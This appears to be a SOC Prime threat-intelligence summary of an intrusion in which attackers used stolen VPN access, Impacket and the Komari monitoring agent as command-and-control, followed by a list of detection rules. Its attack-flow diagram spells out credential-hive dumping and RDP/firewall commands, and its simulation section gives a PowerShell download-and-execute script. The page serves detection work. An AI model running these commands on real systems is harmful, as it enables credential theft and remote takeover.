SOC Prime Bias: Critical

30 Apr 2026 17:19
newspaper icon Huntress

Komari: The “Monitoring” Tool That Didn’t Need Weaponising

Author Photo
SOC Prime Team linkedin icon Follow
Komari: The “Monitoring” Tool That Didn’t Need Weaponising
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

A threat actor used stolen VPN credentials to access a Huntress partner’s Windows workstation, then enabled RDP and deployed the open-source Komari monitoring agent as a SYSTEM-level service disguised as Windows Update Service through NSSM. Once installed, the agent established a persistent WebSocket connection to attacker-controlled infrastructure and provided capabilities such as command execution, terminal access, and heartbeat-style pinging. In practice, the tool functioned as a lightweight command-and-control framework without requiring additional weaponization.

Investigation

The intrusion began with an SSL VPN login originating from 45.153.34.132, followed by the use of Impacket’s smbexec.py to enable RDP and run a series of remote commands. Investigators found that a PowerShell one-liner downloaded the Komari installer directly from GitHub and registered it as a Windows service. That service then launched komari-agent.exe, opened a WebSocket session to the attacker’s server, and enabled arbitrary remote command execution on the host.

Mitigation

Huntress responded by isolating the compromised workstation, disabling the affected user account, and stopping the NSSM-created Komari service. The malicious WebSocket connection was blocked, and the persistence mechanism was removed from the system. Recommended follow-up defenses include tightening VPN access controls, monitoring for suspicious service creation events, inspecting outbound WebSocket activity, and strengthening RDP security.

Response

Defenders should detect creation of a Windows service named Windows Update Service that points to komari-agent.exe, monitor for long-lived outbound WebSocket connections to unfamiliar hosts, and alert on the use of Impacket tools such as smbexec.py for lateral movement. If identified, the affected endpoint should be contained immediately, compromised credentials revoked, and the rogue service removed from the environment.

graph TB %% Class Definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef process fill:#e6e6fa %% Nodes – Actions / Techniques action_initial_access[“<b>Action</b> – <b>T1078 Valid Accounts</b><br/><b>Description</b>: Use stolen VPN credentials to establish an SSLVPN session and gain initial access.”] class action_initial_access technique action_cred_dump[“<b>Action</b> – <b>T1552.002 Unsecured Credentials</b><br/><b>Description</b>: Dump SAM, System and Security registry hives to obtain password hashes.”] class action_cred_dump technique action_enable_rdp[“<b>Action</b> – <b>T1599 Network Boundary Bridging</b><br/><b>Description</b>: Modify the registry key fDenyTSConnections to enable Remote Desktop Protocol access.”] class action_enable_rdp technique action_firewall_rule[“<b>Action</b> – <b>T1562.004 Impair Defenses</b><br/><b>Description</b>: Create a firewall rule named Allow RDP that opens inbound TCP port 3389.”] class action_firewall_rule technique %% Nodes – Tools / Processes tool_vpn[“<b>Tool</b> – <b>Name</b>: VPN Client<br/><b>Purpose</b>: Connect to corporate network via SSLVPN.”] class tool_vpn tool process_regdump[“<b>Process</b> – <b>Command</b>: reg save HKLM\\SYSTEM\\…<br/><b>Description</b>: Dump SAM, System and Security hives.”] class process_regdump process process_reg_modify[“<b>Process</b> – <b>Command</b>: reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f<br/><b>Description</b>: Enable RDP through registry modification.”] class process_reg_modify process process_fw_rule[“<b>Process</b> – <b>Command</b>: netsh advfirewall firewall add rule name=\”Allow RDP\” dir=in action=allow protocol=TCP localport=3389<br/><b>Description</b>: Add firewall rule to allow inbound RDP traffic.”] class process_fw_rule process %% Connections action_initial_access –>|uses| tool_vpn action_initial_access –>|leads to| action_cred_dump action_cred_dump –>|uses| process_regdump action_cred_dump –>|leads to| action_enable_rdp action_enable_rdp –>|uses| process_reg_modify action_enable_rdp –>|leads to| action_firewall_rule action_firewall_rule –>|uses| process_fw_rule

Attack Flow

Detections

Possible Impacket Command Line Patterns (via cmdline)

SOC Prime Team
30 Apr 2026

View

Possible Remote Code Execution using Impacket (via cmdline)

SOC Prime Team
30 Apr 2026

View

Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline)

SOC Prime Team
30 Apr 2026

View

Download or Upload via Powershell (via cmdline)

SOC Prime Team
30 Apr 2026

View

Possible Remote Desktop Services Shadowing (via process_creation)

SOC Prime Team
30 Apr 2026

View

Suspicious Firewall Modifications via CLI (via cmdline)

SOC Prime Team
30 Apr 2026

View

Suspicious Process Utilizes a URL in the Command Line (via cmdline)

SOC Prime Team
30 Apr 2026

View

Alternative Remote Access / Management Software (via process_creation)

SOC Prime Team
30 Apr 2026

View

IOCs (HashSha256) to detect: Komari: The “Monitoring” Tool That Didn’t Need Weaponising

SOC Prime AI Rules
30 Apr 2026

View

IOCs (SourceIP) to detect: Komari: The “Monitoring” Tool That Didn’t Need Weaponising

SOC Prime AI Rules
30 Apr 2026

View

IOCs (DestinationIP) to detect: Komari: The “Monitoring” Tool That Didn’t Need Weaponising

SOC Prime AI Rules
30 Apr 2026

View

Detection of Impacket smbexec.py and cmd.exe Execution via RDP [Windows Process Creation]

SOC Prime AI Rules
30 Apr 2026

View

PowerShell Execution for Komari Agent Installation [Windows Powershell]

SOC Prime AI Rules
30 Apr 2026

View

Detect Komari Agent Persistence via Windows Update Service [Windows System]

SOC Prime AI Rules
30 Apr 2026

View

Detection of Unauthorized SSLVPN Access and Post-Compromise Activity [Firewall]

SOC Prime AI Rules
30 Apr 2026

View

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

  • Attack Narrative & Commands:
    An adversary has obtained a foothold on a Windows host and wants to install the Komari C2 agent to maintain persistence and later dump credentials (T1003.001). To avoid triggering traditional script‑blocking defenses, the attacker runs PowerShell with -ExecutionPolicy Bypass and directly downloads the installer from the public GitHub repository. The command line matches the detection rule exactly, generating the expected telemetry.

  • Regression Test Script:

    # Komari Agent Installation Simulation
$url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1"
$script = (New-Object System.Net.WebClient).DownloadString($url)
Invoke-Expression $script

  • Cleanup Commands:

    # Remove any files created by the simulated installer (if any)
Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue
# Stop any Komari process that may have been started
Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free